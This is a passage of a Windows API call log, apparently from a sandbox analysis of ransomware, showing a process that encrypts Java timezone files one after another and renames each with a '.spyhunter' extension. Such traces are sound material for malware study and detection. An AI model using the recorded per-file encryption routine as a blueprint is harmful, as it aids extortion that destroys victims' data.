[0169.783] WriteFile (in: hFile=0xa0, lpBuffer=0x57e604*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e5c4, lpOverlapped=0x0 | out: lpBuffer=0x57e604*, lpNumberOfBytesWritten=0x57e5c4*=0x4, lpOverlapped=0x0) returned 1 [0169.783] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e5c4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e5c4*=0x30, lpOverlapped=0x0) returned 1 [0169.783] CloseHandle (hObject=0xa0) returned 1 [0169.783] GetProcessHeap () returned 0x2c0000 [0169.783] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0169.783] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Kitts.spyhunter") returned 70 [0169.783] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Kitts" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\st_kitts"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Kitts.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\st_kitts.spyhunter")) returned 1 [0169.784] GetProcessHeap () returned 0x2c0000 [0169.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0169.784] GetProcessHeap () returned 0x2c0000 [0169.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0169.784] GetProcessHeap () returned 0x2c0000 [0169.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed5938 | out: hHeap=0x2c0000) returned 1 [0169.784] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e608 | out: pbBuffer=0x57e608) returned 1 [0169.784] GetProcessHeap () returned 0x2c0000 [0169.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0169.784] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e600*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e600*=0x30) returned 1 [0169.784] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Johns" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\st_johns"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0169.785] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Johns") returned 60 [0169.785] StrStrW (lpFirst="St_Johns", lpSrch=".txt") returned 0x0 [0169.785] GetProcessHeap () returned 0x2c0000 [0169.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0169.785] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e5c4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e5c4*=0x7d0, lpOverlapped=0x0) returned 1 [0169.820] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffff830, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.820] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x7d0, lpNumberOfBytesWritten=0x57e5c4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e5c4*=0x7d0, lpOverlapped=0x0) returned 1 [0169.820] GetProcessHeap () returned 0x2c0000 [0169.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0169.821] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.821] WriteFile (in: hFile=0xa0, lpBuffer=0x57e604*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e5c4, lpOverlapped=0x0 | out: lpBuffer=0x57e604*, lpNumberOfBytesWritten=0x57e5c4*=0x4, lpOverlapped=0x0) returned 1 [0169.821] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e5c4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e5c4*=0x30, lpOverlapped=0x0) returned 1 [0169.821] CloseHandle (hObject=0xa0) returned 1 [0169.821] GetProcessHeap () returned 0x2c0000 [0169.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0169.821] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Johns.spyhunter") returned 70 [0169.821] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Johns" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\st_johns"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Johns.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\st_johns.spyhunter")) returned 1 [0169.822] GetProcessHeap () returned 0x2c0000 [0169.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0169.822] GetProcessHeap () returned 0x2c0000 [0169.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0169.822] GetProcessHeap () returned 0x2c0000 [0169.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed5870 | out: hHeap=0x2c0000) returned 1 [0169.822] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e600 | out: pbBuffer=0x57e600) returned 1 [0169.822] GetProcessHeap () returned 0x2c0000 [0169.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0169.823] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e5f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e5f8*=0x30) returned 1 [0169.823] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Sao_Paulo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\sao_paulo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0169.823] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Sao_Paulo") returned 61 [0169.823] StrStrW (lpFirst="Sao_Paulo", lpSrch=".txt") returned 0x0 [0169.823] GetProcessHeap () returned 0x2c0000 [0169.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0169.823] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e5bc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e5bc*=0x45c, lpOverlapped=0x0) returned 1 [0169.930] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffba4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.930] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x45c, lpNumberOfBytesWritten=0x57e5bc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e5bc*=0x45c, lpOverlapped=0x0) returned 1 [0169.930] GetProcessHeap () returned 0x2c0000 [0169.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0169.930] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.930] WriteFile (in: hFile=0xa0, lpBuffer=0x57e5fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e5bc, lpOverlapped=0x0 | out: lpBuffer=0x57e5fc*, lpNumberOfBytesWritten=0x57e5bc*=0x4, lpOverlapped=0x0) returned 1 [0169.930] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e5bc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e5bc*=0x30, lpOverlapped=0x0) returned 1 [0169.930] CloseHandle (hObject=0xa0) returned 1 [0169.930] GetProcessHeap () returned 0x2c0000 [0169.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0169.930] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Sao_Paulo.spyhunter") returned 71 [0169.930] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Sao_Paulo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\sao_paulo"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Sao_Paulo.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\sao_paulo.spyhunter")) returned 1 [0169.934] GetProcessHeap () returned 0x2c0000 [0169.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0169.934] GetProcessHeap () returned 0x2c0000 [0169.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0169.934] GetProcessHeap () returned 0x2c0000 [0169.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed57a8 | out: hHeap=0x2c0000) returned 1 [0169.934] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e600 | out: pbBuffer=0x57e600) returned 1 [0169.934] GetProcessHeap () returned 0x2c0000 [0169.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0169.934] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e5f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e5f8*=0x30) returned 1 [0169.934] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Regina" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\regina"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0169.935] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Regina") returned 58 [0169.935] StrStrW (lpFirst="Regina", lpSrch=".txt") returned 0x0 [0169.935] GetProcessHeap () returned 0x2c0000 [0169.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0169.935] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e5bc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e5bc*=0x1e1, lpOverlapped=0x0) returned 1 [0169.936] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffe1f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.936] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1e1, lpNumberOfBytesWritten=0x57e5bc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e5bc*=0x1e1, lpOverlapped=0x0) returned 1 [0169.936] GetProcessHeap () returned 0x2c0000 [0169.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0169.936] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.936] WriteFile (in: hFile=0xa0, lpBuffer=0x57e5fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e5bc, lpOverlapped=0x0 | out: lpBuffer=0x57e5fc*, lpNumberOfBytesWritten=0x57e5bc*=0x4, lpOverlapped=0x0) returned 1 [0169.936] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e5bc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e5bc*=0x30, lpOverlapped=0x0) returned 1 [0169.936] CloseHandle (hObject=0xa0) returned 1 [0169.936] GetProcessHeap () returned 0x2c0000 [0169.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0169.936] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Regina.spyhunter") returned 68 [0169.937] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Regina" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\regina"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Regina.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\regina.spyhunter")) returned 1 [0169.937] GetProcessHeap () returned 0x2c0000 [0169.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0169.937] GetProcessHeap () returned 0x2c0000 [0169.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0169.937] GetProcessHeap () returned 0x2c0000 [0169.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb9700 | out: hHeap=0x2c0000) returned 1 [0169.937] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e5f8 | out: pbBuffer=0x57e5f8) returned 1 [0169.938] GetProcessHeap () returned 0x2c0000 [0169.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0169.938] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e5f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e5f0*=0x30) returned 1 [0169.938] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Recife" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\recife"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0169.938] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Recife") returned 58 [0169.938] StrStrW (lpFirst="Recife", lpSrch=".txt") returned 0x0 [0169.938] GetProcessHeap () returned 0x2c0000 [0169.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0169.938] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e5b4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e5b4*=0x179, lpOverlapped=0x0) returned 1 [0169.939] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffe87, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.939] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x179, lpNumberOfBytesWritten=0x57e5b4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e5b4*=0x179, lpOverlapped=0x0) returned 1 [0169.939] GetProcessHeap () returned 0x2c0000 [0169.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0169.939] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.939] WriteFile (in: hFile=0xa0, lpBuffer=0x57e5f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e5b4, lpOverlapped=0x0 | out: lpBuffer=0x57e5f4*, lpNumberOfBytesWritten=0x57e5b4*=0x4, lpOverlapped=0x0) returned 1 [0169.939] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e5b4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e5b4*=0x30, lpOverlapped=0x0) returned 1 [0169.940] CloseHandle (hObject=0xa0) returned 1 [0169.940] GetProcessHeap () returned 0x2c0000 [0169.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0169.940] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Recife.spyhunter") returned 68 [0169.940] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Recife" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\recife"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Recife.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\recife.spyhunter")) returned 1 [0169.940] GetProcessHeap () returned 0x2c0000 [0169.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0169.940] GetProcessHeap () returned 0x2c0000 [0169.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0169.940] GetProcessHeap () returned 0x2c0000 [0169.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb9640 | out: hHeap=0x2c0000) returned 1 [0169.941] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e5f8 | out: pbBuffer=0x57e5f8) returned 1 [0169.941] GetProcessHeap () returned 0x2c0000 [0169.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0169.941] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e5f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e5f0*=0x30) returned 1 [0169.941] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Rankin_Inlet" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\rankin_inlet"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0169.941] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Rankin_Inlet") returned 64 [0169.941] StrStrW (lpFirst="Rankin_Inlet", lpSrch=".txt") returned 0x0 [0169.941] GetProcessHeap () returned 0x2c0000 [0169.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0169.941] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e5b4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e5b4*=0x41c, lpOverlapped=0x0) returned 1 [0170.017] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffbe4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0170.017] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x41c, lpNumberOfBytesWritten=0x57e5b4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e5b4*=0x41c, lpOverlapped=0x0) returned 1 [0170.017] GetProcessHeap () returned 0x2c0000 [0170.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0170.017] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.017] WriteFile (in: hFile=0xa0, lpBuffer=0x57e5f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e5b4, lpOverlapped=0x0 | out: lpBuffer=0x57e5f4*, lpNumberOfBytesWritten=0x57e5b4*=0x4, lpOverlapped=0x0) returned 1 [0170.018] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e5b4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e5b4*=0x30, lpOverlapped=0x0) returned 1 [0170.018] CloseHandle (hObject=0xa0) returned 1 [0170.018] GetProcessHeap () returned 0x2c0000 [0170.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0170.018] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Rankin_Inlet.spyhunter") returned 74 [0170.018] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Rankin_Inlet" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\rankin_inlet"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Rankin_Inlet.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\rankin_inlet.spyhunter")) returned 1 [0170.019] GetProcessHeap () returned 0x2c0000 [0170.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0170.019] GetProcessHeap () returned 0x2c0000 [0170.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0170.019] GetProcessHeap () returned 0x2c0000 [0170.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e04ac8 | out: hHeap=0x2c0000) returned 1 [0170.019] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e5f0 | out: pbBuffer=0x57e5f0) returned 1 [0170.019] GetProcessHeap () returned 0x2c0000 [0170.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0170.019] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e5e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e5e8*=0x30) returned 1 [0170.019] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Phoenix" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\phoenix"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0170.020] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Phoenix") returned 59 [0170.020] StrStrW (lpFirst="Phoenix", lpSrch=".txt") returned 0x0 [0170.020] GetProcessHeap () returned 0x2c0000 [0170.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0170.020] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e5ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e5ac*=0x8d, lpOverlapped=0x0) returned 1 [0170.020] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffff73, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0170.020] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x8d, lpNumberOfBytesWritten=0x57e5ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e5ac*=0x8d, lpOverlapped=0x0) returned 1 [0170.021] GetProcessHeap () returned 0x2c0000 [0170.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0170.021] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.021] WriteFile (in: hFile=0xa0, lpBuffer=0x57e5ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e5ac, lpOverlapped=0x0 | out: lpBuffer=0x57e5ec*, lpNumberOfBytesWritten=0x57e5ac*=0x4, lpOverlapped=0x0) returned 1 [0170.021] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e5ac, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e5ac*=0x30, lpOverlapped=0x0) returned 1 [0170.021] CloseHandle (hObject=0xa0) returned 1 [0170.021] GetProcessHeap () returned 0x2c0000 [0170.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0170.021] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Phoenix.spyhunter") returned 69 [0170.021] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Phoenix" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\phoenix"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Phoenix.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\phoenix.spyhunter")) returned 1 [0170.022] GetProcessHeap () returned 0x2c0000 [0170.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0170.022] GetProcessHeap () returned 0x2c0000 [0170.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0170.022] GetProcessHeap () returned 0x2c0000 [0170.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb9580 | out: hHeap=0x2c0000) returned 1 [0170.022] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e5f0 | out: pbBuffer=0x57e5f0) returned 1 [0170.022] GetProcessHeap () returned 0x2c0000 [0170.022] RtlAllocateHeap 